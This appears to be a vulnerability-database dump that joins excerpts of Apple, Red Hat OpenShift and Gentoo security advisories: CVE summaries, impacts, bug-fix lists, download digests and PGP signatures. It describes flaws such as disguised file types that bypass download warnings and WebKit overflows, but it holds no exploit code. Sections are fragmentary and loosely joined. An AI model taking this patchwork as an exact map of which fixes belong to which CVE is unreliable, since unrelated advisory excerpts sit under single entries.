Tiger, when an email attachment is double-clicked in Mail, Download Validation is used to warn the user if the file type is not "safe". Certain techniques can be used to disguise the file's type so that Download Validation is bypassed. This update addresses the issue by presenting Download Validation with the entire file, providing more information for Download Validation to detect unknown or unsafe file types in attachments. perl CVE-ID: CVE-2005-4217 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9 Impact: Perl programs may fail to drop privileges Description: When a perl program running as root attempts to switch to another user ID, the operation may fail without notification to the program. This may cause a program to continue to run with root privileges, assuming they have been dropped. This can cause security issues in third-party tools. This update addresses the issue by preventing such applications from continuing if the operation fails. This issue does not affect Mac OS X v10.4 or later systems. Credit to Jason Self for reporting this issue. rsync CVE-ID: CVE-2005-3712 Available for: Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Authenticated users may cause an rsync server to crash or execute arbitrary code Description: A heap-based buffer overflow may be triggered when the rsync server is used with the flag that allows extended attributes to be transferred. It may be possible for a malicious user with access to an rsync server to cause denial of service or code execution. This update addresses the problem by ensuring that the destination buffer is large enough to hold the extended attributes. This issue does not affect systems prior to Mac OS X v10.4. Credit to Jan-Derk Bakker for reporting this issue. Safari CVE-ID: CVE-2005-4504 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Viewing a maliciously-crafted web page may result in arbitrary code execution Description: A heap-based buffer overflow in WebKit's handling of certain HTML could allow a malicious web site to cause a crash or execute arbitrary code as the user viewing the site. This update addresses the issue by preventing the condition causing the overflow. Credit to Suresec LTD for reporting this issue. Safari CVE-ID: CVE-2006-0387 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Viewing a malicious web page may cause arbitrary code execution Description: By preparing a web page including specially-crafted JavaScript, an attacker may trigger a stack buffer overflow that could lead to arbitrary code execution with the privileges of the user. This update addresses the issue by performing additional bounds checking. An issue involving HTTP redirection can cause the browser to access a local file, bypassing certain restrictions. This update addresses the issue by preventing cross-domain HTTP redirects. Safari, LaunchServices CVE-ID: CVE-2006-0394 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Viewing a malicious web site may result in arbitrary code execution Description: It is possible to construct a file which appears to be a safe file type, such as an image or movie, but is actually an application. When the "Open `safe' files after downloading" option is enabled in Safari's General preferences, visiting a malicious web site may result in the automatic download and execution of such a file. A proof-of-concept has been detected on public web sites that demonstrates the automatic execution of shell scripts. Syndication CVE-ID: CVE-2006-0389 Available for: Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Subscriptions to malicious RSS content can lead to cross-site scripting Description: Syndication (Safari RSS) may allow JavaScript code embedded in feeds to run within the context of the RSS reader document, allowing malicious feeds to circumvent Safari's security model. This update addresses the issue by properly removing JavaScript code from feeds. Syndication is only available in Mac OS X v10.4 and later. The following security enhancements are also included in this update: FileVault: AES-128 encrypted FileVault disk images are now created with more restrictive operating system permissions. Credit to Eric Hall of DarkArt Consulting Services for reporting this issue. iChat: A malicious application named Leap.A that attempts to propagate using iChat has been detected. Users should use caution when opening files that are obtained from the network. Further information is available via: http://docs.info.apple.com/article.html?artnum=108009 Security Update 2006-001 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.4.5 (PowerPC) and Mac OS X Server v10.4.5 The download file is named: "SecUpd2006-001Ti.dmg" Its SHA-1 digest is: 999b73a54951b4e0a7f873fecf75f92840e8b439 For Mac OS X v10.4.5 (Intel) The download file is named: "SecUpd2006-001Intel.dmg" Its SHA-1 digest is: 473f94264876fa49fa15a8b6bb4bc30956502ad5 For Mac OS X v10.3.9 The download file is named: "SecUpd2006-001Pan.dmg" Its SHA-1 digest is: b6a000d451a1b1696726ff60142fc3da08042433 For Mac OS X Server v10.3.9 The download file is named: "SecUpdSrvr2006-001Pan.dmg" Its SHA-1 digest is: 2299380d72a61eadcbd0a5c6f46c924600ff5a9c Information will also be posted to the Apple Product Security web site: http://docs.info.apple.com/article.html?artnum=61798 This message is signed with Apple's Product Security PGP key, and details are available at: http://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.5 (Build 5050) iQEVAwUBRAYYVoHaV5ucd/HdAQJQWggApQmizj2t3+/87Fqun66/HCEkFt2YhUoe cmel0/KwJhWrk+LV+CYvixbDvKuGIjP8CWB9/s78YN93pOI5WcfyTKd07rEQYkT4 i8KPrM9QjdvgIjKd6O/VAOkzBc3DqV7KNVR2Hewa3jOigTm7Yxil9o/nZt1TLxAI 9TN0uduc13WHC8WE2N41I8MQ+VdGTX3ANZkfgR90lua4A2E1ab9kCN2qbg+E7Cus SkwsKp0qSH7bl8v0/R6c1hsYG0T1RwSWU6arAEliqzrrIbCm0Yxtgwp/CYFWC46j TQNCcppNgcr/pVPojACy8WFtQ3wEb6rJ4ZjH1C5nOem2EoCBh10WFw== =1Ww0 -----END PGP SIGNATURE-----
var-201912-1044 xmlParseBalancedChunkMemoryRecover in parser.c in libxml2 before 2.9.10 has a memory leak related to newDoc->oldNs. libxml2 Is vulnerable to a lack of resource release after a valid lifetime.Denial of service (DoS) It may be put into a state. Bug Fix(es): * Gather image registry config (backport to 4.3) (BZ#1836815) * Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist (BZ#1849176) * Login with OpenShift not working after cluster upgrade (BZ#1852429) * Limit the size of gathered federated metrics from alerts in Insights Operator (BZ#1874018) * [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs (BZ#1879110) * [release 4.3] OpenShift APIs become unavailable for more than 15 minutes after one of master nodes went down(OAuth) (BZ#1880293) You may download the oc tool and use it to inspect release image metadata as follows: (For x86_64 architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-x86_64 The image digest is sha256:9ff90174a170379e90a9ead6e0d8cf6f439004191f80762764a5ca3dbaab01dc (For s390x architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-s390x The image digest is sha256:605ddde0442e604cfe2d6bd1541ce48df5956fe626edf9cc95b1fca75d231b64 (For ppc64le architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-ppc64le The image digest is sha256:d3c9e391c145338eae3feb7f6a4e487dadc8139a353117d642fe686d277bcccc 3. Bugs fixed (https://bugzilla.redhat.com/): 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1836815 - Gather image registry config (backport to 4.3) 1849176 - Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist 1874018 - Limit the size of gathered federated metrics from alerts in Insights Operator 1874399 - [DR] etcd-member-recover.sh fails to pull image with unauthorized 1879110 - [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs 5. Bug Fix(es): * Configuring the system with non-RT kernel will hang the system (BZ#1923220) 3. Bugs fixed (https://bugzilla.redhat.com/): 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 5. JIRA issues fixed (https://issues.jboss.org/): CNF-802 - Infrastructure-provided enablement/disablement of interrupt processing for guaranteed pod CPUs CNF-854 - Performance tests in CNF Tests 6. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: OpenShift Container Platform 4.6 compliance-operator security and bug fix update Advisory ID: RHSA-2021:0436-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2021:0436 Issue date: 2021-02-16 CVE Names: CVE-2018-20843 CVE-2019-1551 CVE-2019-5018 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-11068 CVE-2019-13050 CVE-2019-13627 CVE-2019-14889 CVE-2019-15165 CVE-2019-15903 CVE-2019-16168 CVE-2019-16935 CVE-2019-18197 CVE-2019-19221 CVE-2019-19906 CVE-2019-19956 CVE-2019-20218 CVE-2019-20386 CVE-2019-20387 CVE-2019-20388 CVE-2019-20454 CVE-2019-20807 CVE-2019-20907 CVE-2019-20916 CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 CVE-2020-1971 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-6405 CVE-2020-7595 CVE-2020-8177 CVE-2020-8492 CVE-2020-9327 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 CVE-2020-11793 CVE-2020-13630 CVE-2020-13631 CVE-2020-13632 CVE-2020-14382 CVE-2020-14391 CVE-2020-14422 CVE-2020-15503 CVE-2020-24659 CVE-2020-28362 ==================================================================== 1. Summary: An update for compliance-content-container, ose-compliance-openscap-container, ose-compliance-operator-container, and ose-compliance-operator-metadata-container is now available for Red Hat OpenShift Container Platform 4.6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. The compliance-operator image updates are now available for OpenShift Container Platform 4.6. This advisory provides the following updates among others: * Enhances profile parsing time. * Fixes excessive resource consumption from the Operator. * Fixes default content image. * Fixes outdated remediation handling. Security Fix(es): * golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -cli.html. 4. Bugs fixed (https://bugzilla.redhat.com/): 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1918990 - ComplianceSuite scans use quay content image for initContainer 1919135 - [OCP v46] The autoApplyRemediation pauses the machineConfigPool if there is outdated complianceRemediation object present 1919846 - After remediation applied, the compliancecheckresults still reports Failed status for some rules 1920999 - Compliance operator is not displayed when disconnected mode is selected in the OpenShift Web-Console. 5. References: https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2019-1551 https://access.redhat.com/security/cve/CVE-2019-5018 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-11068 https://access.redhat.com/security/cve/CVE-2019-13050 https://access.redhat.com/security/cve/CVE-2019-13627 https://access.redhat.com/security/cve/CVE-2019-14889 https://access.redhat.com/security/cve/CVE-2019-15165 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-16168 https://access.redhat.com/security/cve/CVE-2019-16935 https://access.redhat.com/security/cve/CVE-2019-18197 https://access.redhat.com/security/cve/CVE-2019-19221 https://access.redhat.com/security/cve/CVE-2019-19906 https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20218 https://access.redhat.com/security/cve/CVE-2019-20386 https://access.redhat.com/security/cve/CVE-2019-20387 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2019-20454 https://access.redhat.com/security/cve/CVE-2019-20807 https://access.redhat.com/security/cve/CVE-2019-20907 https://access.redhat.com/security/cve/CVE-2019-20916 https://access.redhat.com/security/cve/CVE-2020-1730 https://access.redhat.com/security/cve/CVE-2020-1751 https://access.redhat.com/security/cve/CVE-2020-1752 https://access.redhat.com/security/cve/CVE-2020-1971 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-6405 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/cve/CVE-2020-8177 https://access.redhat.com/security/cve/CVE-2020-8492 https://access.redhat.com/security/cve/CVE-2020-9327 https://access.redhat.com/security/cve/CVE-2020-9802 https://access.redhat.com/security/cve/CVE-2020-9803 https://access.redhat.com/security/cve/CVE-2020-9805 https://access.redhat.com/security/cve/CVE-2020-9806 https://access.redhat.com/security/cve/CVE-2020-9807 https://access.redhat.com/security/cve/CVE-2020-9843 https://access.redhat.com/security/cve/CVE-2020-9850 https://access.redhat.com/security/cve/CVE-2020-9862 https://access.redhat.com/security/cve/CVE-2020-9893 https://access.redhat.com/security/cve/CVE-2020-9894 https://access.redhat.com/security/cve/CVE-2020-9895 https://access.redhat.com/security/cve/CVE-2020-9915 https://access.redhat.com/security/cve/CVE-2020-9925 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-10029 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/cve/CVE-2020-13630 https://access.redhat.com/security/cve/CVE-2020-13631 https://access.redhat.com/security/cve/CVE-2020-13632 https://access.redhat.com/security/cve/CVE-2020-14382 https://access.redhat.com/security/cve/CVE-2020-14391 https://access.redhat.com/security/cve/CVE-2020-14422 https://access.redhat.com/security/cve/CVE-2020-15503 https://access.redhat.com/security/cve/CVE-2020-24659 https://access.redhat.com/security/cve/CVE-2020-28362 https://access.redhat.com/security/updates/classification/#moderate 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYCvGHtzjgjWX9erEAQgbKw/9Had++A7098ddqffgX/DicKszQfZFT6Qm iN2FfA9in0X4MvScGqGchX2hv7nqdoz+lS5+tHI52Bp6i5ZT9bAjBx/GrETirwBw y76qRaIr0a3I5rSirguZSs52IeGv+l00RCACfZgH/H1oFzNJY1pRjoOPy60/prP6 P/4l6u5CcRcTpxmEoU6XMyl+BGgk2/0FaWE8ZgXnnm7w/VSzvj5XymwLjE48wG3j iGGKCCwv/zvtP/ntG+MMUkKDUpFOxtLWp2PonZKsB0ZiK5Rm87izVVxDHmXhlirP Pgq/evTDV3SmXqjFN5K1e08cMdjpDvnjHDx0fLJrvhBlLTYczOnkLMmk72Emwsm+ xEj3q80MZ9EyMAZe33TO9kTpGRfeBUF1FenDE1k1foY6lBT2WqiH2pIypubH7X0j BIGAnJf5swl8EGbLQUIVIA1o69dR6Zz0kvdbfm/NVMUjbRyTyaZcP1chViVGrI2h 43RH51tfvwp7lMBqFyvhtbopvmnt3egIFenrQcg0tT4v6+eRiwz9HAfDXjeez/I6 qKJboYtU+hnEizNNOkbHPICUWD9pSFZewAV7kPIJeJ99JWzXABMUl6Ku3Ds9hojR 7MIu0W9WbzdfUSd1i53fcbPcRauXLu273xyWo402ZOQOWAHhVLA08J9YoGWYamIP hg9Ld3UR71Q=5olk -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Bug Fix(es): * Aggregator pod tries to parse ConfigMaps without results (BZ#1899479) * The compliancesuite object returns error with ocp4-cis tailored profile (BZ#1902251) * The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object (BZ#1902634) * [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object (BZ#1907414) * The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator (BZ#1908991) * Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" (BZ#1909081) * [OCP v46] Always update the default profilebundles on Compliance operator startup (BZ#1909122) 3. Bugs fixed (https://bugzilla.redhat.com/): 1899479 - Aggregator pod tries to parse ConfigMaps without results 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1902251 - The compliancesuite object returns error with ocp4-cis tailored profile 1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object 1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object 1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator 1909081 - Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" 1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup 5. Description: Red Hat 3scale API Management delivers centralized API management features through a distributed, cloud-hosted layer. It includes built-in features to help in building a more successful API program, including access control, rate limits, payment gateway integration, and developer experience tools. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/documentation/en-us/red_hat_3scale_api_management /2.10/html-single/installing_3scale/index 4. Bugs fixed (https://bugzilla.redhat.com/): 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 5. Bugs fixed (https://bugzilla.redhat.com/): 1732329 - Virtual Machine is missing documentation of its properties in yaml editor 1783192 - Guest kernel panic when start RHEL6.10 guest with q35 machine type and virtio disk in cnv 1791753 - [RFE] [SSP] Template validator should check validations in template's parent template 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1848954 - KMP missing CA extensions in cabundle of mutatingwebhookconfiguration 1848956 - KMP requires downtime for CA stabilization during certificate rotation 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1853911 - VM with dot in network name fails to start with unclear message 1854098 - NodeNetworkState on workers doesn't have "status" key due to nmstate-handler pod failure to run "nmstatectl show" 1856347 - SR-IOV : Missing network name for sriov during vm setup 1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS 1859235 - Common Templates - after upgrade there are 2 common templates per each os-workload-flavor combination 1860714 - No API information from `oc explain` 1860992 - CNV upgrade - users are not removed from privileged SecurityContextConstraints 1864577 - [v2v][RHV to CNV non migratable source VM fails to import to Ceph-rbd / File system due to overhead required for Filesystem 1866593 - CDI is not handling vm disk clone 1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs 1868817 - Container-native Virtualization 2.6.0 Images 1873771 - Improve the VMCreationFailed error message caused by VM low memory 1874812 - SR-IOV: Guest Agent expose link-local ipv6 address for sometime and then remove it 1878499 - DV import doesn't recover from scratch space PVC deletion 1879108 - Inconsistent naming of "oc virt" command in help text 1881874 - openshift-cnv namespace is getting stuck if the user tries to delete it while CNV is running 1883232 - Webscale: kubevirt/CNV datavolume importer pod inability to disable sidecar injection if namespace has sidecar injection enabled but VM Template does NOT 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1885153 - [v2v][RHV to CNv VM import] Wrong Network mapping do not show a relevant error message 1885418 - [openshift-cnv] issues with memory overhead calculation when limits are used 1887398 - [openshift-cnv][CNV] nodes need to exist and be labeled first, *before* the NodeNetworkConfigurationPolicy is applied 1889295 - [v2v][VMware to CNV VM import API] diskMappings: volumeMode Block is not passed on to PVC request. 1891285 - Common templates and kubevirt-config cm - update machine-type 1891440 - [v2v][VMware to CNV VM import API]Source VM with no network interface fail with unclear error 1892227 - [SSP] cluster scoped resources are not being reconciled 1893278 - openshift-virtualization-os-images namespace not seen by user 1893646 - [HCO] Pod placement configuration - dry run is not performed for all the configuration stanza 1894428 - Message for VMI not migratable is not clear enough 1894824 - [v2v][VM import] Pick the smallest template for the imported VM, and not always Medium 1894897 - [v2v][VMIO] VMimport CR is not reported as failed when target VM is deleted during the import 1895414 - Virt-operator is accepting updates to the placement of its workload components even with running VMs 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1898072 - Add Fedora33 to Fedora common templates 1898840 - [v2v] VM import VMWare to CNV Import 63 chars vm name should not fail 1899558 - CNV 2.6 - nmstate fails to set state 1901480 - VM disk io can't worked if namespace have label kubemacpool 1902046 - Not possible to edit CDIConfig (through CDI CR / CDIConfig) 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1903014 - hco-webhook pod in CreateContainerError 1903585 - [v2v] Windows 2012 VM imported from RHV goes into Windows repair mode 1904797 - [VMIO][vmware] A migrated RHEL/Windows VM starts in emergency mode/safe mode when target storage is NFS and target namespace is NOT "default" 1906199 - [CNV-2.5] CNV Tries to Install on Windows Workers 1907151 - kubevirt version is not reported correctly via virtctl 1907352 - VM/VMI link changes to `kubevirt.io~v1~VirtualMachineInstance` on CNV 2.6 1907691 - [CNV] Configuring NodeNetworkConfigurationPolicy caused "Internal error occurred" for creating datavolume 1907988 - VM loses dynamic IP address of its default interface after migration 1908363 - Applying NodeNetworkConfigurationPolicy for different NIC than default disables br-ex bridge and nodes lose connectivity 1908421 - [v2v] [VM import RHV to CNV] Windows imported VM boot failed: INACCESSIBLE BOOT DEVICE error 1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference 1909458 - [V2V][VMware to CNV VM import via api using VMIO] VM import to Ceph RBD/BLOCK fails on "qemu-img: /data/disk.img" error 1910857 - Provide a mechanism to enable the HotplugVolumes feature gate via HCO 1911118 - Windows VMI LiveMigration / shutdown fails on 'XML error: non unique alias detected: ua-') 1911396 - Set networkInterfaceMultiqueue false in rhel 6 template for e1000e interface 1911662 - el6 guests don't work properly if virtio bus is specified on various devices 1912908 - Allow using "scsi" bus for disks in template validation 1913248 - Creating vlan interface on top of a bond device via NodeNetworkConfigurationPolicy fails 1913320 - Informative message needed with virtctl image-upload, that additional step is needed from the user 1913717 - Users should have read permitions for golden images data volumes 1913756 - Migrating to Ceph-RBD + Block fails when skipping zeroes 1914177 - CNV does not preallocate blank file data volumes 1914608 - Obsolete CPU models (kubevirt-cpu-plugin-configmap) are set on worker nodes 1914947 - HPP golden images - DV shoudld not be created with WaitForFirstConsumer 1917908 - [VMIO] vmimport pod fail to create when using ceph-rbd/block 1917963 - [CNV 2.6] Unable to install CNV disconnected - requires kvm-info-nfd-plugin which is not mirrored 1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration 1920576 - HCO can report ready=true when it failed to create a CR for a component operator 1920610 - e2e-aws-4.7-cnv consistently failing on Hyperconverged Cluster Operator 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923979 - kubernetes-nmstate: nmstate-handler pod crashes when configuring bridge device using ip tool 1927373 - NoExecute taint violates pdb; VMIs are not live migrated 1931376 - VMs disconnected from nmstate-defined bridge after CNV-2.5.4->CNV-2.6.0 upgrade 5. Description: Red Hat OpenShift Do (odo) is a simple CLI tool for developers to create, build, and deploy applications on OpenShift. The odo tool is completely client-based and requires no server within the OpenShift cluster for deployment. It detects changes to local code and deploys it to the cluster automatically, giving instant feedback to validate changes in real-time. It supports multiple programming languages and frameworks. Solution: Download and install a new CLI binary by following the instructions linked from the References section. Bugs fixed (https://bugzilla.redhat.com/): 1832983 - Release of 1.1.3 odo-init-image 5. Solution: See the documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/ 4.6/html/serverless_applications/index 4. Bugs fixed (https://bugzilla.redhat.com/): 1874857 - CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1897643 - CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time 1897646 - CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time 1906381 - Release of OpenShift Serverless Serving 1.12.0 1906382 - Release of OpenShift Serverless Eventing 1.12.0 5
var-202203-0129 A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. JIRA issues fixed (https://issues.jboss.org/): WRKLDS-653 - New SSO 1.1.1 release to address existing CVEs 6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202208-39 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: WebKitGTK+: Multiple Vulnerabilities Date: August 31, 2022 Bugs: #866494, #864427, #856445, #861740, #837305, #845252, #839984, #833568, #832990 ID: 202208-39 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======= Multiple vulnerabilities have been found in WebkitGTK+, the worst of which could result in the arbitrary execution of code. Background ========= WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================ ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.36.7 >= 2.36.7 Description ========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the CVE identifiers referenced below for details. Impact ===== Please review the referenced CVE identifiers for details. Workaround ========= There is no known workaround at this time. Resolution ========= All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.36.7" References ========= [ 1 ] CVE-2022-2294 https://nvd.nist.gov/vuln/detail/CVE-2022-2294 [ 2 ] CVE-2022-22589 https://nvd.nist.gov/vuln/detail/CVE-2022-22589 [ 3 ] CVE-2022-22590 https://nvd.nist.gov/vuln/detail/CVE-2022-22590 [ 4 ] CVE-2022-22592 https://nvd.nist.gov/vuln/detail/CVE-2022-22592 [ 5 ] CVE-2022-22620 https://nvd.nist.gov/vuln/detail/CVE-2022-22620 [ 6 ] CVE-2022-22624 https://nvd.nist.gov/vuln/detail/CVE-2022-22624 [ 7 ] CVE-2022-22628 https://nvd.nist.gov/vuln/detail/CVE-2022-22628 [ 8 ] CVE-2022-22629 https://nvd.nist.gov/vuln/detail/CVE-2022-22629 [ 9 ] CVE-2022-22662 https://nvd.nist.gov/vuln/detail/CVE-2022-22662 [ 10 ] CVE-2022-22677 https://nvd.nist.gov/vuln/detail/CVE-2022-22677 [ 11 ] CVE-2022-26700 https://nvd.nist.gov/vuln/detail/CVE-2022-26700 [ 12 ] CVE-2022-26709 https://nvd.nist.gov/vuln/detail/CVE-2022-26709 [ 13 ] CVE-2022-26710 https://nvd.nist.gov/vuln/detail/CVE-2022-26710 [ 14 ] CVE-2022-26716 https://nvd.nist.gov/vuln/detail/CVE-2022-26716 [ 15 ] CVE-2022-26717 https://nvd.nist.gov/vuln/detail/CVE-2022-26717 [ 16 ] CVE-2022-26719 https://nvd.nist.gov/vuln/detail/CVE-2022-26719 [ 17 ] CVE-2022-30293 https://nvd.nist.gov/vuln/detail/CVE-2022-30293 [ 18 ] CVE-2022-30294 https://nvd.nist.gov/vuln/detail/CVE-2022-30294 [ 19 ] CVE-2022-32784 https://nvd.nist.gov/vuln/detail/CVE-2022-32784 [ 20 ] CVE-2022-32792 https://nvd.nist.gov/vuln/detail/CVE-2022-32792 [ 21 ] CVE-2022-32893 https://nvd.nist.gov/vuln/detail/CVE-2022-32893 [ 22 ] WSA-2022-0002 https://webkitgtk.org/security/WSA-2022-0002.html [ 23 ] WSA-2022-0003 https://webkitgtk.org/security/WSA-2022-0003.html [ 24 ] WSA-2022-0007 https://webkitgtk.org/security/WSA-2022-0007.html [ 25 ] WSA-2022-0008 https://webkitgtk.org/security/WSA-2022-0008.html Availability 